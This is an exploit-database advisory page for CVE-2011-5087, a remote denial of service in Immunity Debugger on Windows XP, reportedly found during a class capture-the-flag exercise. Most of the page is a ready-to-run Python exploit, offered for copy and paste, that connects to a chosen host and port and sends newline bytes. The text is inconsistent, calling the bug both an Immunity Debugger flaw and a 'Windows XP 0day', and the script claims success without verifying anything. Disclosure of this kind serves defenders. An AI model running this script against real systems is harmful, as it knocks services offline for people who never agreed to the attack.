Immunity Debugger Remote Denial of Service 0Day

2012-04-18 / 2012-08-15
Credit: InfoSec
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2011-5087
CWE: CWE-noinfo


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Immunity Debugger Remote Denial of Service 0Day Tested against version 1.76 and 1.80 on Windows XP distributions Has not been tested for potential privilege escalation vectors. We first wrote about Immunity Debugger here: http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/ Discovered by a student that wishes to remain anonymous in the course CTF. This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous, he has contributed a python version of the 0day. A patch that can be applied to Windows has not been made available. You can find a python version of the exploit to copy and paste here: #!/usr/bin/python #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html import sys import os import time import getopt import socket class Error(Exception): def __init__(self, error): self.errorStr=error def __str__(self): return repr(self.errorStr) class Exploit(): def __init__(self, targetHost, targetPort): self.targetHost = targetHost def exploit(self, targetHost, targetPort): try: socket.inet_aton(targetHost) s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((targetHost,targetPort)) except socket.error: raise Error("Unable to exploit (Connect failed.)") sys.exit(0) # exploit try: s.sendto("\n\n\n", (targetHost, targetPort)) except: raise Error("Unable to exploit (Exploit failed.)") def usage(): print "[!] Usage:" print " ( -h, --help ):" print " Print this message." print " ( --targetHost= ): Target host." print " --targetHost=127.0.0.1" print " ( --targetPort= ): Target port." print " --targetPort=8888" def main(): print "[$] Windows XP 0Day" try: opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", "targetPort="]) except getopt.GetoptError, err: # Print help information and exit: print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized" usage() sys.exit(0) targetHost=None targetPort=None for opt, arg in opts: if opt in ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost": targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I would be assuming to say we'll never get here. print "[!] Parameter error." usage() sys.exit(0) if not targetHost: print "[!] Parameter error: targetHost not set." usage() sys.exit(0) if not targetPort: print "[!] Parameter error: targetPort not set." usage() sys.exit(0) exploit = Exploit(targetHost, targetPort) print "[*] Attempting to exploit:" try: exploit.exploit(targetHost, int(targetPort)) except Error as error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0) print "[*] Exploit appears to have worked." # Standard boilerplate to call the main() function to begin # the program. if __name__=='__main__': main()

References:

http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top